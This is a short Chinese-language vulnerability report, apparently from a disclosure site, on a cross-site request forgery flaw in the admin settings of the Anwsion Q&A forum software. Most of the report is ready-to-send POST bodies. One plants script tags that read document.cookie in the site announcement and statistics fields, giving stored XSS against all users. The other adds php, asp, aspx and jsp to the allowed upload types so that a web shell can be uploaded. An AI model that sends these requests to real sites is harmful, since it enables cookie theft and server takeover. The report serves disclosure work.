anwsion后台一个设置缺陷

### 简要描述： 这个应该是中。 ### 详细说明： 程序在后台设置没有HASH来限制CSRF的防御,故导致一些可能出现的危害 ``` http://127.0.0.1:8080/wenda/?/admin/setting/sys_save_ajax/ ``` ``` site_announce=<script>alert(document.cookie)</script>&url_rewrite_enable=N&request_route=1&request_route_custom=%2Fhome%2Fexplore%2F%3D%3D%3D%2Fexplore%2F%0A%2Fhome%2Fexplore%2Fguest%3D%3D%3D%2Fguest%0A%2Fhome%2Fexplore%2Fcategory-(%3Anum)%3D%3D%3D%2Fcategory%2F(%3Anum)%0A%2Fpeople%2Flist%2F%3D%3D%3D%2Fusers%2F%0A%2Faccount%2Flogin%2F%3D%3D%3D%2Flogin%2F%0A%2Faccount%2Flogout%2F%3D%3D%3D%2Flogout%2F%0A%2Faccount%2Fsetting%2F(%3Aany)%2F%3D%3D%3D%2Fsetting%2F(%3Aany)%2F&online_count_open=Y&online_interval=15&unread_flush_interval=100&auto_question_lock_day=30&statistic_code=%3Cscript%3Ealert(1)%3C%2Fscript%3E&report_reason=%E5%B9%BF%E5%91%8A%2FSPAM%0A%E6%81%B6%E6%84%8F%E7%81%8C%E6%B0%B4%0A%E8%BF%9D%E8%A7%84%E5%86%85%E5%AE%B9%0A%E6%96%87%E4%B8%8D%E5%AF%B9%E9%A2%98%0A%E9%87%8D%E5%A4%8D%E5%8F%91%E9%97%AE&report_message_uid=1&time_style=Y&admin_login_seccode=Y&_post_type=ajax ``` site_announce参数对应的是:站点功能->网站公告：(支持HTML) statistic_code参数对应的是:站点功能->网站统计代码 其他参数默认即可。 ``` http://127.0.0.1:8080/wenda/?/admin/setting/type-content ``` 内容设置里面可以设置上传文件名的后缀,更加危险！！！ ``` quick_publish=Y&upload_enable=Y&allowed_upload_types=jpg%2Cjpeg%2Cpng%2Cgif%2Czip%2Cdoc%2Cdocx%2Crar%2Cpdf%2Cpsd%2Cphp%2Casp%2Caspx%2Cjsp&upload_size_limit=512&answer_length_lower=2&question_title_limit=100&comment_limit=0&topic_title_limit=12&upload_avatar_size_limit=512&answer_edit_time=30&uninterested_fold=5&best_answer_day=30&best_answer_min_count=3&best_agree_min_count=3&related_question_keyword_count=&_post_type=ajax ``` ``` allowed_upload_types=jpg%2Cjpeg%2Cpng%2Cgif%2Czip%2Cdoc%2Cdocx%2Crar%2Cpdf%2Cpsd%2Cphp%2Casp%2Caspx%2Cjsp ``` 懂的。。。 ### 漏洞证明： [<img src="https://images.seebug.org/upload/201212/01225308d7cc06c92229898c9d768138c5db0b06.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201212/01225308d7cc06c92229898c9d768138c5db0b06.jpg) 首页会中XSS,中所有用户。 [<img src="https://images.seebug.org/upload/201212/01225458f89fe479005ed08320d9d7955d62599f.jpg" alt="2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201212/01225458f89fe479005ed08320d9d7955d62599f.jpg) 用户可以直接拿Shell.